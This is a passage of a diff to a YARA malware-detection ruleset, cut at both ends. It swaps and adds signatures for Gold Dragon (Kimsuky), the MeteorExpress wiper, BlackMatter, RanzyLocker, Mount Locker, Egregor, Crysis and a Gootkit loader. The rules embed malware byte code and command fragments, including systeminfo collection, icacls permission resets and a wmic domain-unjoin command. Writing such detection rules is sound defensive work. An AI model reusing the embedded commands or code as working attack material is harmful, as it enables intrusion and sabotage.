32 45 45 38 34 39 37 41 45 34 39 35 41 33 31 31 34 35 41 37 37 41 35 43 39 44 35 35 37 30 34 43 30 38 38 33 42 30 31 35 46 45 31 41 45 39 46 44 46 46 45 32 30 38 46 31 33 46 41 45 44 46 00 31 35 32 30 33 33 46 38 33 46 37 46 41 36 36 34 35 31 39 33 42 33 32 32 43 43 42 31 36 37 32 46 30 38 39 35 36 42 36 38 43 33 38 44 31 33 32 46 32 32 37 38 46 43 46 30 46 41 30 34 44 46 45 46 00 33 41 33 36 41 46 34 41 46 30 41 31 46 45 35 37 39 35 44 42 39 39 46 41 38 44 33 39 34 46 41 32 44 38 39 30 41 32 32 35 32 38 30 41 38 41 31 35 39 41 43 37 39 46 31 45 34 38 45 45 31 38 46 46 00 44 43 37 42 45 38 33 42 33 45 46 46 38 31 45 38 43 39 45 30 36 46 37 44 37 43 31 46 34 42 44 37 33 34 46 32 30 32 30 41 34 32 34 32 39 45 32 32 41 32 36 31 42 30 45 45 45 31 36 44 31 39 46 46 } - $s5 = { 39 38 41 43 30 38 30 44 38 38 37 45 31 34 43 43 39 32 32 44 34 35 37 43 33 42 31 30 35 35 37 31 45 33 36 41 37 35 43 43 39 31 31 42 33 35 46 36 30 43 32 46 35 30 36 44 44 44 45 43 35 43 41 46 00 31 33 46 33 37 31 33 43 30 38 42 33 30 43 45 34 37 36 35 37 33 45 43 31 38 32 39 30 31 32 35 30 45 39 36 42 34 37 37 35 33 31 39 46 34 36 41 38 41 30 30 41 34 46 31 45 42 38 41 43 35 32 42 46 00 43 39 38 39 33 42 41 33 46 43 31 46 41 39 41 37 43 38 37 33 42 32 37 38 37 41 41 41 44 38 38 39 45 33 38 46 30 43 33 39 36 39 45 37 41 32 37 42 30 44 33 37 45 30 41 } - $s6 = "SSH_MSG_KEX_DH_GEX_INIT" ascii + $str1 = { 1b 30 03 00 4a 00 00 00 03 00 00 11 02 73 23 00 00 0a 0a 06 6f 24 00 00 0a 2d 3a 02 72 [1-4] 00 00 70 28 25 00 00 0a 0b 72 [1-4] 00 00 70 02 28 25 00 00 0a 28 1a 00 00 0a 06 6f 26 00 00 0a 07 7e 01 00 00 04 28 05 00 00 06 2c 06 06 6f 27 00 00 0a de 03 26 de 00 2a 00 00 01 10 00 00 00 00 1b 00 2b 46 00 03 13 00 00 01 } + $str2 = { 1b 30 05 00 1a 01 00 00 04 00 00 11 16 0a 73 28 00 00 0a 0b 07 6f 29 00 00 0a 1e 5b 8d 2c 00 00 01 0c 07 6f 2a 00 00 0a 1e 5b 8d 2c 00 00 01 0d 73 2b 00 00 0a 13 06 11 06 08 6f 2c 00 00 0a 11 06 09 6f 2c 00 00 0a de 0c 11 06 2c 07 11 06 6f 12 00 00 0a dc 08 8e 69 09 8e 69 58 8d 2c 00 00 01 13 04 08 11 04 08 8e 69 28 2d 00 00 0a 09 16 11 04 08 8e 69 09 8e 69 28 2e 00 00 0a 11 04 04 28 06 00 00 06 13 04 11 04 8e 69 28 2f 00 00 0a 13 05 07 08 09 6f 30 00 00 0a 13 07 02 19 73 31 00 00 0a 13 08 03 18 73 31 00 00 0a 13 09 11 09 11 07 17 73 32 00 00 0a 13 0a 11 09 11 05 16 11 05 8e 69 6f 33 00 00 0a 11 09 11 04 16 11 04 8e 69 6f 33 00 00 0a 11 08 11 0a 20 [4] 6f 34 00 00 0a de 30 11 0a 2c 07 11 0a 6f 12 00 00 0a dc 11 09 2c 07 11 09 6f 12 00 00 0a dc 11 08 2c 07 11 08 6f 12 00 00 0a dc 11 07 2c 07 11 07 6f 12 00 00 0a dc 17 0a de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 2a 00 00 41 94 00 00 02 00 00 00 2b 00 00 00 12 00 00 00 3d 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 ae 00 00 00 2c 00 00 00 da 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 a2 00 00 00 44 00 00 00 e6 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 99 00 00 00 59 00 00 00 f2 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 90 00 00 00 6e 00 00 00 fe 00 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 08 00 00 00 06 01 00 00 0e 01 00 00 0a 00 00 00 00 00 00 00 } + $str3 = { 1b 30 03 00 24 00 00 00 05 00 00 11 73 35 00 00 0a 0a 06 03 6f 36 00 00 0a 06 02 17 6f 37 00 00 0a 0b de 0a 06 2c 06 06 6f 12 00 00 0a dc 07 2a 01 10 00 00 02 00 06 00 12 18 00 0a 00 00 00 00 } condition: - uint16(0)==0x5a4d and filesize >600KB and 5 of them + uint16(0)==0x5a4d and filesize >5KB and 2 of them } -rule ARKBIRD_SOLG_APT_Kimsuky_Aug_2020_1 : FILE +rule ARKBIRD_SOLG_WIP_Meteorexpress_Aug_2021_1 : FILE { meta: - description = "Detect Gold Dragon used by Kimsuky APT group" + description = "Detect MeteorExpress/BreakWin wiper" author = "Arkbird_SOLG" - id = "dd79aa3b-0bbc-5fdd-808e-c2dee6d89804" - date = "2020-08-31" - modified = "2020-09-14" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-09-14/Kimsuky/APT_Kimsuky_Aug_2020_1.yar#L1-L23" + id = "6dffc8c9-ccd0-5cf3-8f3c-38adad8508b2" + date = "2021-08-06" + modified = "2021-08-07" + reference = "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-07/BreakWin/WIP_MeteorExpress_Aug_2021_1.yara#L1-L26" license_url = "N/A" - logic_hash = "4644ea81535c867a36a882bb270cea784ae135e7acc7078823be0579b1746932" + logic_hash = "80e40479d699b988d1282e407edd51b5e3ea796ebf380d82f5a5aafaacafe75d" score = 75 - quality = 75 + quality = 71 tags = "FILE" - hash1 = "4ff2a67b094bcc56df1aec016191465be4e7de348360fd307d1929dc9cbab39f" - hash2 = "97935fb0b5545a44e136ee07df38e9ad4f151c81f5753de4b59a92265ac14448" + hash1 = "2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b" + hash2 = "074bcc51b77d8e35b96ed444dc479b2878bf61bf7b07e4d7bd4cf136cc3c0dce" + hash3 = "6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4" + hash4 = "9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473" + tlp = "white" + adversary = "-" strings: - $s1 = "/c systeminfo >> %s" fullword ascii - $s2 = "/c dir %s\\ >> %s" fullword ascii - $s3 = ".?AVGen3@@" fullword ascii - $s4 = { 48 6f 73 74 3a 20 25 73 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 25 73 25 73 0d 0a 25 73 0d 0a 25 73 } - $s5 = "%s?filename=%s" fullword ascii - $s6 = "Content-Disposition: form-data; name=\"userfile\"; filename=\"" fullword ascii - $s7 = "Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG" fullword ascii - $s8 = "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"" fullword ascii - $s9 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)" fullword ascii - $s10 = "\\Microsoft\\HNC" fullword ascii - $s11 = "Mozilla/5.0" fullword ascii + $s1 = { 8d 04 2a 8b f1 3b c8 0f 42 f0 33 c9 8b c6 83 c0 01 0f 92 c1 f7 d9 0b c8 e8 42 00 00 00 53 68 18 2c 41 00 50 89 44 24 1c 89 5f 10 89 77 14 e8 aa 20 00 00 8b 74 24 1c 83 c4 0c c6 04 1e 00 83 fd 10 72 0a 8b 0f 8d 55 01 e8 50 00 00 00 5d 89 37 8b c7 5f 5e 5b 59 } + $s2 = { 68 cc 00 00 00 b8 [3] 00 e8 [2] 00 00 8b f1 89 75 8c 83 4d d4 ff 33 c0 83 4d d8 ff 6a 44 5f 57 50 89 45 dc 89 45 e0 8d 45 90 50 e8 [3] 00 8d 46 1c 89 7d 90 83 c4 0c 83 78 14 08 72 02 8b 00 89 45 98 8d 7d e4 33 c0 83 c6 04 ab 8b ce 83 7e 14 08 ab ab 72 02 8b 0e 8b 46 10 8d 04 41 8b ce 72 02 8b 0e ff 75 8c 33 d2 50 51 8d 4d e4 89 55 e4 89 55 e8 89 55 ec e8 [2] fd ff 33 d2 89 55 fc 8b 45 e8 89 55 88 39 45 ec 74 0d 33 c9 66 89 08 83 c0 02 89 45 e8 eb 0f 8d 4d 88 51 50 8d 4d e4 e8 3c 02 00 00 33 d2 8b 7d 8c 8d 4d d4 51 8d 4d 90 51 8b 47 34 52 52 52 52 52 52 ff 75 e4 52 ff 70 04 ff 15 08 [2] 00 85 c0 74 28 ff 75 d8 8d 4f 3c e8 [2] ff ff ff 75 d4 8d } + $s3 = { 8b ec 83 e4 f8 83 ec 7c a1 14 50 41 00 33 c4 89 44 24 78 8b 45 0c 8b 4d 08 89 0c 24 53 56 57 83 e8 01 0f 84 05 01 00 00 83 e8 01 0f 84 23 01 00 00 83 e8 0d 74 15 ff 75 14 ff 75 10 ff 75 0c 51 ff 15 2c e1 40 00 e9 0b 01 00 00 8d 44 24 40 c6 05 f4 63 41 00 01 50 51 ff 15 30 e1 40 00 8b d8 6a 00 89 5c 24 18 ff 15 10 e0 40 00 8b f0 8d 44 24 48 56 50 53 ff 15 28 e1 40 00 56 ff 15 0c e0 40 00 83 3d f8 63 41 00 00 0f 84 8d 00 00 00 53 ff 15 04 e0 40 00 ff 35 f8 63 41 00 89 44 24 14 50 ff 15 00 e0 40 00 8b d8 8d 44 24 18 50 6a 18 ff 35 f8 63 41 00 ff 15 14 e0 40 00 8b 7c 24 20 8d 44 24 30 8b 74 24 1c 50 ff 74 24 10 ff 15 44 e1 40 00 8b 44 24 38 2b c6 8b 74 24 10 68 20 00 cc 00 99 2b c2 6a 00 8b c8 8b 44 24 44 6a 00 56 ff 74 24 30 2b c7 d1 f9 ff 74 24 30 99 2b c2 d1 f8 50 51 ff 74 24 34 ff 15 18 e0 40 00 53 56 ff 15 00 e0 40 00 56 ff 15 08 e0 40 00 8d 44 24 40 } + $s4 = { 38 1b 38 26 38 2e 38 39 38 3f 38 4a 38 50 38 5e 38 67 38 6c 38 79 38 7e 38 ec 38 } + $s5 = { 55 8b ec 51 a1 60 57 41 00 83 f8 fe 75 0a e8 8e 0d 00 00 a1 60 57 41 00 83 f8 ff 75 07 b8 ff ff 00 00 eb 1b 6a 00 8d 4d fc 51 6a 01 8d 4d 08 51 50 ff 15 50 e0 40 00 85 c0 74 e2 66 8b 45 08 8b } + $s6 = { 69 63 61 63 6c 73 2e 65 78 65 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 79 73 74 65 6d 44 61 74 61 5c 53 2d 31 2d 35 2d 31 38 5c 52 65 61 64 4f 6e 6c 79 22 20 2f 72 65 73 65 74 20 2f 54 } + $s7 = { 77 6d 69 63 20 63 6f 6d 70 75 74 65 72 73 79 73 74 65 6d 20 77 68 65 72 65 20 6e 61 6d 65 3d 22 25 63 6f 6d 70 75 74 65 72 6e 61 6d 65 25 22 20 63 61 6c 6c 20 75 6e 6a 6f 69 6e 64 6f 6d 61 69 6e 6f 72 77 6f 72 6b 67 72 6f 75 70 } + $s8 = { 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 6a ?? 68 [3] 00 b9 [3] 00 e8 [2] 00 00 68 [3] 00 e8 [2] 03 00 59 c3 } + $s9 = { 8b 55 ?? 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 08 ff 15 ?? ?? 47 00 8b d0 8d 4d ?? e8 ?? ?? fe ff c6 45 fc 09 8d 45 ?? 50 8d 45 ?? 50 8d 4d ?? e8 ?? ?? ?? ff 83 ec 0c 8b cc 89 65 ?? 51 ff 70 04 ff 30 e8 ?? ?? ?? ff c6 45 fc 0a 83 ec 18 8b cc 89 65 ?? 68 ?? ?? 48 00 e8 ?? ?? ?? ff c6 45 fc 0b c6 45 fc 09 8d } condition: - uint16(0)==0x5a4d and filesize >150KB and 8 of them + uint16(0)==0x5A4D and filesize >25KB and 4 of ($s*) } import "pe" @@ -195462,473 +197569,488 @@ rule ARKBIRD_SOLG_MAL_Stealer_Cookie_July_2020_1 : FILE condition: uint16(0)==0x5a4d and filesize <2600KB and (pe.imphash()=="89c8a19cc2d9172de5901988530c700d" or ((3 of ($x*)) and (8 of ($s*)))) } -rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE { meta: - description = "Detect BlackMatter ransomware" + description = "Detect RanzyLocker ransomware" author = "Arkbird_SOLG" - id = "eb308cde-af92-5b34-b256-88009f90810f" - date = "2021-08-02" - modified = "2021-08-02" - reference = "https://twitter.com/abuse_ch/status/1421834305416933376" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23" + id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7" + date = "2021-03-16" + modified = "2021-03-17" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24" license_url = "N/A" - logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75" + logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e" score = 50 - quality = 71 + quality = 53 tags = "FILE" - hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6" - hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984" - level = "Experimental" - tlp = "white" - adversary = "-" + hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d" strings: - $s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 } - $s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 } - $s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 } - $s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa } - $s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 } - $s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d } - $s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc } + $s1 = "-nolan" fullword wide + $s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 } + $s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 } + $s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 } + $s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 } + $s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 } + $s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 } + $s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 } + $s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 } + $s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 } + $s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 } + $s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 } + $s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 } condition: - uint16(0)==0x5A4D and filesize >25KB and 5 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 10 of ($s*) } -rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE +rule ARKBIRD_SOLG_Ran_Mount_Locker_Nov_2020_1 : FILE { meta: - description = "Detect Egregor ransomware (variant Sept2020)" + description = "Detect Mount Locker ransomware (November 2020 variant)" author = "Arkbird_SOLG" - id = "b44b93ec-b470-511e-b08f-7d83efd30ecc" - date = "2020-10-07" - modified = "2020-10-16" + id = "20fde6f4-ef7d-57c4-8cc2-a6ea810c2b0c" + date = "2020-11-20" + modified = "2020-11-22" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Mount Locker/Ran_Mount_Locker_Nov_2020_1.yar#L1-L26" license_url = "N/A" - logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b" + logic_hash = "028e89e9c0c46ac5c36fee5cbfba068b4c6c1f53aa224e454ebd358f2c6ae9a9" score = 75 quality = 75 tags = "FILE" - hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321" - hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7" - hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f" - hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb" - hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332" + hash1 = "e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037" + hash2 = "226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2" strings: - $x1 = "dmocx.dll" fullword ascii - $s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide - $s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii - $s4 = "Type Descriptor'" fullword ascii - $s5 = "=$=`=h=p=t=x=|=" fullword ascii - $s6 = "--nop" fullword wide - $s7 = "9,94989@9X9" fullword ascii + $s1 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword wide + $s2 = "VBA6.DLL" fullword ascii + $s3 = "MSComDlg.CommonDialog" fullword ascii + $s4 = "DllFunctionCall" fullword ascii + $s5 = { 00 2a 00 5c 00 41 00 43 00 3a 00 5c [35-160] 00 2e 00 76 00 62 00 70 } + $s6 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\COMCTL32.oca" fullword wide + $s7 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\MSFLXGRD.oca" fullword ascii + $s8 = "C:\\Program Files (x86)\\Microsoft Visual Studio\\VB98\\VB6.OLB" fullword ascii + $s9 = "SFLXGRD.OCX" fullword ascii + $s10 = "COMDLG32.OCX" fullword ascii + $s11 = "COMCTL32.OCX" fullword ascii + $seq1 = { 42 00 24 00 40 00 43 00 67 00 2f 00 44 00 08 00 4a 00 51 00 77 00 54 00 76 00 25 00 55 00 48 00 00 00 00 00 5d 00 4c 00 09 00 53 00 3e 00 73 00 62 00 52 00 50 00 0b 00 61 00 01 00 61 01 3a 00 03 00 57 00 4f 00 75 00 54 00 71 00 22 00 53 00 37 00 00 00 30 00 1d 00 46 00 5a 00 5c 00 48 00 78 00 63 00 02 00 1d 00 23 00 3b 00 28 00 55 00 73 00 28 00 61 00 3b 00 00 00 00 00 44 00 4e 00 4a 00 4d 00 61 00 40 00 59 00 2b 00 38 00 02 01 04 01 54 00 08 00 52 00 56 00 1d 00 42 00 3e 00 00 00 00 00 35 00 70 00 3b 00 37 00 6f 00 26 00 26 00 40 00 64 00 02 00 51 00 3c 00 41 00 16 00 3e 00 00 00 47 00 58 00 33 00 89 00 54 00 2d 00 29 00 50 00 04 00 59 00 5d 00 4f 00 1b 00 36 00 30 00 83 00 41 00 00 00 2a 00 54 00 47 00 86 00 56 00 19 00 24 00 4e 00 3a 00 45 00 51 00 4d 00 1e 00 3b 00 2b 00 81 00 35 00 00 00 3a 00 65 00 57 00 03 00 2d 00 62 00 53 } + $seq2 = { 5a 00 3d 00 14 00 51 00 1f 00 67 00 1c 00 24 00 00 00 00 00 00 00 6f 00 27 00 62 00 5d 00 6d 00 30 00 01 00 27 01 25 00 62 00 7b 00 05 00 56 00 24 00 3c 00 3d 00 5d 00 2e 00 62 00 03 00 0a 00 57 00 6a 00 02 00 5d 00 02 01 23 01 67 00 20 00 54 00 01 00 6c 01 17 00 0b 00 44 00 21 00 1e 00 01 00 52 01 60 00 3b 00 11 00 45 00 2a 00 59 00 2c 00 19 00 00 00 5a 00 1e 00 61 00 5c 00 6b 00 31 00 01 00 1a 01 2d 00 4a 00 6f 00 11 00 57 00 2c 00 3a 00 3a 00 50 00 2a 00 61 00 02 00 07 00 53 00 7b 00 01 01 5b 00 02 01 6a 01 0b 00 03 00 6d 00 43 00 0c 00 64 00 4d 00 44 00 5f 00 08 00 5a 00 68 00 2b 00 32 00 68 } condition: - uint16(0)==0x5a4d and filesize >200KB and 1 of ($x*) and 4 of ($s*) + uint16(0)==0x5a4d and filesize >100KB and 6 of ($s*) and 1 of ($seq*) } -rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE +rule ARKBIRD_SOLG_Loa_JS_Gootkit_Nov_2020_1 : FILE { meta: - description = "Detect Crysis ransomware" + description = "Detect JS loader used on the Gootkit killchain (November 2020)" author = "Arkbird_SOLG" - id = "9cc1a1b9-c4a9-5add-833d-81be02ffc4fb" - date = "2020-10-16" - modified = "2020-10-16" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Crysis_Sep_2020_1.yar#L1-L23" + id = "649133bd-a44c-5d99-befa-0508fed27ed8" + date = "2020-11-21" + modified = "2020-11-21" + reference = "https://twitter.com/ffforward/status/1330214661577437187" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-21/Gootkit/Loa_JS_Gootkit_Nov_2020_1.yar#L1-L16" license_url = "N/A" - logic_hash = "c7706b862cd0277c8b726d32dc819ad7e15933b28e3a31599922f3dc0beb8348" + logic_hash = "f24d31e7107b8c59b969481596a5e1369933bf2b0fa5117cd1aa5f7ea116d8d5" score = 75 - quality = 69 + quality = 75 tags = "FILE" - hash1 = "34c485ad11076ede709ff409c0e1867dc50fd40311ae6e7318ddf50679fa4049" - hash2 = "4708750c9a6fdeaec5f499a3cd26bb5f61db4f82e66484dc7b44118effbb246f" - hash3 = "b565c8e1e81796db13409f37e4bd28877272b5e54ab5c0a3d9b6a024e7f5a039" - hash4 = "8e8b6818423930eea073315743b788aef2f41198961946046b7b89042cb3f95a" + hash1 = "7aec3ed791529182c0f64ce34415c3c705a79f3d628cbcff70c34a9f73d8ff42" strings: - $s1 = { 6f 25 25 4a 72 2e 2e 5c 24 } - $s2 = { 52 53 44 53 25 7e 6d } - $s3 = { 78 78 4a 6f 25 25 5c 72 2e 2e 38 24 } - $s4 = { 25 65 65 ca af 7a 7a f4 8e ae ae 47 e9 08 08 10 18 ba ba } - $s5 = { 58 74 1a 1a 34 2e 1b 1b 36 2d 6e 6e dc b2 5a 5a b4 ee a0 a0 5b fb 52 52 a4 f6 3b 3b 76 4d d6 d6 b7 61 b3 b3 7d ce 29 29 52 7b e3 e3 dd 3e 2f 2f 5e 71 84 84 13 97 53 53 } - $s6 = { 3b 32 32 64 56 3a 3a 74 4e 0a 0a 14 1e 49 49 92 db 06 06 0c 0a 24 24 48 